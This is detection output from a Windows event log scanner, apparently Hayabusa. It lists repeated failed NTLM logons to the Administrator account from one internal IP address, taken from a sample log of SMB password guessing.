+2016-09-20 01:51:18.850 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BKDKUXNNhuSqRiTE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.884 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cBocrjNXjmuPCKRJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.924 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: loCrAXibgVxcOtCM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.966 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mZ7pHOJeOExrON2E | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.006 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MeucKpaodpmdsqhD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.044 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LRlmBeBlV6n4MQyo | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.080 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: E8FYOF6HxJHqm7GW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.122 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9tBtz1GYn5J8sbFH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.160 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Qn8PlxEzIu9AKUgt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.196 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QdjqlNDU3U150UAw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.248 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: esaTfuwuiFAkIVs6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.280 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: Y4LbVQ5ytgVCqFmL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.333 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rWoX76sgYTVwxkD5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.386 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QQFJRRYn6sjYK5cD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.432 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wyVuBGEFGJqImQ7W | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.468 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pRvnyVGxG8i0e3PQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.520 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: X6Hv2fj43a8j1O2P | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:51:19.564 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: myP4zVFyw2qE1SV7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.612 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lpmBcVilH72dYF7E | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.643 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Jd9hKGDxLcnZphlL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.684 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5OmXgOD9kaGJ4PIA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.724 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BpQtWW0fAEzNH28B | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.768 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EgNkY8LKSWcnLM00 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.813 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Z8S1dUwb3HjOnEs9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.869 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 49ZKcnswdISJDwbS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.914 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qOuYmww71pTM0l3t | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.952 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PUHoGgmXKRJknRZG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.988 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6yf8LSkcwBP9s1mN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.036 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: JmH2AMDmkZVbCt8b | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.081 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I23o9EQLpPpn9RlY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.125 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MrEVj3DB1prpOtnq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.164 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0Iau1IHKxWRsqQaG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.212 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NdPC9LVhZS2l27XF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.256 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vxcofRpjCFme3mg2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:51:20.290 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: e1VnQLbETh1GgX0c | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.336 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rbdPYXx8mx4SV9G7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.385 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hcv3HWid3auIu7cY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.428 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5o2OviUvdOmk5HON | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.476 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bVBSORhgFwTy2TWO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.524 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DsIhCEZcfYenufvf | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.560 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xDadVFtE4toNiagy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.601 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GnydJjDBdzJWqmWa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.652 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GW8im2IhNzrGoSFs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.701 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aTzlqq9HLEX6wzdU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.785 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Gz98aGXd0fdVzmTy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.812 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: Q2zOy64cp6dXelNl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.858 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: X1BflxNjQRNopjb4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.914 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 401ulFeuzCtp5lPF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.956 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: p0SIzJrzkseFB1j8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.000 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cyQMxtEdbud8iJLI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.044 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7gbjIqxD4E6fYsGx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:51:21.084 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rEeZEcj63sBddCsK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.120 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tiATfqYtrH9LoqR0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.169 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PG3HB3GqFwQFLdcq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.216 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: G8NU6WRdrq9DxM6r | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.258 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cvZKIkI2aeBzbwe0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.300 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2EE7AL3nJ7qsnk4Y | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.331 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: feu34D0VvoMrnWzo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.369 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mrNRIpCpmAV3npax | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.401 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zpxgEvvoC0stFdTl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.445 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XvpDKRAPDS36sqNL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.496 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4cqJKEIySxiQdCRD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.535 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: Pm1F7QEwBE054ui0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.580 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RvIjhyfdlXiX72Es | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.622 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dJilW4KgIEeh5VNr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.668 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2Ka0FYYdVOj90l0L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.715 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: B9ZjGE8T6RuGx8SZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.758 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nkti4BGVrpoAQRBL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:51:21.804 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fZy2YJPOg1YZ2bd0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.848 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rUE6E9H9i0l0P7Jp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.892 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0Pkpt2nmRorQ3x0o | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.937 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hCZNNzSyi4mLLaxZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.986 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: O9ZqF43sDjSirvMK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.041 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XOw9DjHISDX57XUe | IP Addr: 192.168.198.149 | AuthPackage: 
